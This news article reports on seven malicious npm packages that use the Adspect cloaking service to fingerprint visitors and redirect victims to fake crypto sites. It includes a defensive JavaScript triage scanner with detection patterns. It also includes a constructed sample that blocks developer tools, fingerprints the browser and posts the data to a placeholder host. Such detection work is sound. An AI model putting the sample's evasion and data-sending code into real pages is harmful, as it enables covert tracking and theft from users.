Cybersecurity researchers have uncovered a set of seven npm packages published by a single attacker. These packages use a cloaking service called Adspect to distinguish between real victims and security researchers, and ultimately redirect to sketchy crypto-themed sites.
The malicious npm packages were published by a threat actor named ‘dino_reborn’ between September and November 2025. The packages are signals-embed (342 downloads), dsidospsodlks (184 downloads), applicationooks21 (340 downloads), application-phskck (199 downloads), integrator-filescrypt2025 (199 downloads), integrator-2829 (276 downloads), and integrator-2830 (290 downloads).
Adspect pretends to be a cloud-based service that protects your advertising campaigns
According to its website, Adspect promotes a cloud-based service designed to protect ad campaigns from unwanted traffic such as click fraud and antivirus company bots. It also claims to offer “bulletproof cloaking” and to “reliably cloak any advertising platform.”

There are three plans: Ant-Fraud, Personal, and Professional, with monthly fees of $299, $499, and $999. The company also claims users can promote “anything they want,” adding that it follows a no-questions-asked policy. That is, the company says it does not care what users do and does not enforce content rules.
Socket security researcher Olivia Brown said: “When a visitor visits a fake website built by one of the packages, the threat actor determines whether the visitor is a victim or a security researcher (…) If the visitor is a victim, a fake CAPTCHA is displayed, which ultimately leads to the malicious site. If the visitor is a security researcher, all they need to know is that something malicious may be happening on the fake website.”
Adspect’s ability to block researchers’ actions in web browsers
Six of these packages contain 39kB of malware that hides itself and captures a fingerprint of the system. It also attempts to evade analysis by blocking developer actions in web browsers. This prevents researchers from viewing source code or launching developer tools.
These packages use a JavaScript feature called an Immediately Invoked Function Expression (IIFE). This allows the malicious code to execute as soon as it is loaded into the web browser.
However, ‘signals-embed’ has no outright malicious functionality and is designed to build decoy white pages. The captured information is sent to a proxy (‘association-google(.)xyz/adspect-proxy(.)php’) that determines whether the traffic comes from a victim or a researcher and serves a fake CAPTCHA.
Once a victim clicks on the CAPTCHA checkbox, they are redirected to a fake crypto-related page impersonating a service like StandX with the goal of stealing their digital assets. However, if a visitor is flagged as a potential researcher, a decoy white page is displayed instead. It also contains HTML code for displaying a privacy policy associated with a fake company named Offlido.
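For defenders reviewing a dependency, the behaviours described above (code that runs on load via an IIFE, blocked developer actions, system fingerprinting, data sent to a PHP proxy) can be turned into a static triage pass. The following is an added example, not code from the packages or from Socket's report; the regex patterns, weights, threshold and both sample snippets are constructed assumptions about common implementations.

```javascript
// Added example: static triage of browser-side JavaScript found in a dependency.
// The patterns are ASSUMED common implementations of the behaviours the article
// describes; they are not extracted from the actual packages.
const FP_PROPS = [/navigator\.userAgent/, /navigator\.languages?/, /navigator\.platform/,
  /screen\.(?:width|height)/, /getTimezoneOffset|Intl\.DateTimeFormat/];

const RULES = [
  // Runs on load: (function(){...})() or (() => {...})(). Common in benign code, so low weight.
  { id: "iife", weight: 1, test: (s) =>
      /[(!]\s*(?:async\s+)?(?:function\b|\([^)]*\)\s*=>)/.test(s) &&
      /\}\s*\)\s*\(\s*\)|\}\s*\(\s*\)\s*\)/.test(s) },
  // Right-click context menu suppressed.
  { id: "blocks-context-menu", weight: 3, test: (s) =>
      /(?:["']contextmenu["']|oncontextmenu\s*=)[\s\S]{0,200}?(?:preventDefault\s*\(|return\s+false)/.test(s) },
  // Keyboard shortcuts for developer tools or view-source intercepted.
  { id: "blocks-devtools-keys", weight: 3, test: (s) =>
      /keydown/.test(s) && /preventDefault\s*\(/.test(s) &&
      /["']F12["']|keyCode\s*===?\s*123|ctrlKey[\s\S]{0,80}?["'][uUiIjJ]["']/.test(s) },
  // Three or more distinct browser/system properties read.
  { id: "fingerprinting", weight: 2, test: (s) =>
      FP_PROPS.filter((re) => re.test(s)).length >= 3 },
  // Data sent to a server-side PHP script.
  { id: "posts-to-php", weight: 2, test: (s) => /(?:fetch|\.open)\s*\([^)]*\.php\b/.test(s) },
];

// Score one source string; anything at or above the threshold goes to manual review.
function triage(source, threshold = 6) {
  const hits = RULES.filter((r) => r.test(source));
  const score = hits.reduce((n, r) => n + r.weight, 0);
  return { hits: hits.map((r) => r.id), score, review: score >= threshold };
}

// Constructed sample combining the described behaviours (placeholder host).
const SAMPLE_SUSPECT = `(function () {
  document.addEventListener("contextmenu", function (e) { e.preventDefault(); });
  document.addEventListener("keydown", function (e) {
    if (e.key === "F12" || (e.ctrlKey && e.key === "u")) e.preventDefault();
  });
  var fp = { ua: navigator.userAgent, lang: navigator.language, w: screen.width };
  fetch("https://collector.example/proxy.php", { method: "POST", body: JSON.stringify(fp) });
})();`;

// Constructed benign sample: an IIFE alone must not trigger a review.
const SAMPLE_BENIGN = `(() => {
  const btn = document.querySelector("#menu");
  btn.addEventListener("click", () => btn.classList.toggle("open"));
  console.log(navigator.language);
})();`;

console.log(triage(SAMPLE_SUSPECT), triage(SAMPLE_BENIGN));
```

A hit only means the file deserves a human look: minified or obfuscated code can evade these patterns, and legitimate sites also disable right-click.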
This report coincides with a report from Amazon Web Services. The company’s Amazon Inspector team says it has identified and reported more than 150,000 packages associated with a coordinated TEA token farming campaign in the npm registry, which originated in a first wave detected in April 2024.
“This is one of the largest package flood incidents in open source registry history and represents a defining moment in supply chain security,” researchers Chi Tran and Charlie Bacon said. “Threat actors are automatically generating and publishing packages to earn cryptocurrency rewards without users’ knowledge, revealing how this campaign has grown exponentially since it was first identified.”


